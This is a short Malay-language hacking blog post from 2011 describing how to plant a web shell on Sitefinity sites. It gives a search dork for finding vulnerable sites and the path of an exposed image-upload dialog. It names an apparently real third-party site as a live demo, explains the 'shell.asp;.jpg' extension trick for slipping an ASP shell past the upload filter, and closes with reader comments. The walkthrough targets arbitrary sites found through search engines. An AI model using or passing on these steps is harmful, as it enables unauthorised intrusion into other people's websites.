Pages

What do you think about this blog?

Followers PHC

Sunday, November 13, 2011

SiteFinity Exploit(Upload Shell) Asp

Assalamualaikum :D hehe
Okay bertemu dengan saya lagi nih, tidak lain dan tidak bukan hanyalah seorang yang hensem :D.

Mari kita mulakan??---->Let Start!!

Dork :
- "use your imagine" but i'm use it's > "sitefinity: login"

Exploit:
- http://[localhost]/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Live Demo:
- http://www.hoac-bsa.org/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Caranya :
Pilih satu site di google and try tuk exploit site itu.Dengan memasukkan code ini Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx di dalam site..

contoh: www.sitetarget.com/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx..
then akn kuar satu tempat upload..korang bley upload di situ..:D


Kita boley mengupload shell kita dengan mengubah extension file shell kita dengan: shell.asp;.jpg

Dh selesai?? ok tekan je upload image..and dh selesai ketip click original view file :D.

Credits-NoEntry and rakan2 di Phc.

3 comments:

  1. NoEntry...
    aq x brpe nk pham la...
    ley explain plahan2 x??
    dri : Syahmi PHC

    ReplyDelete
  2. dork:- digunakan untuk cari site.. and masukkan exploit.

    ReplyDelete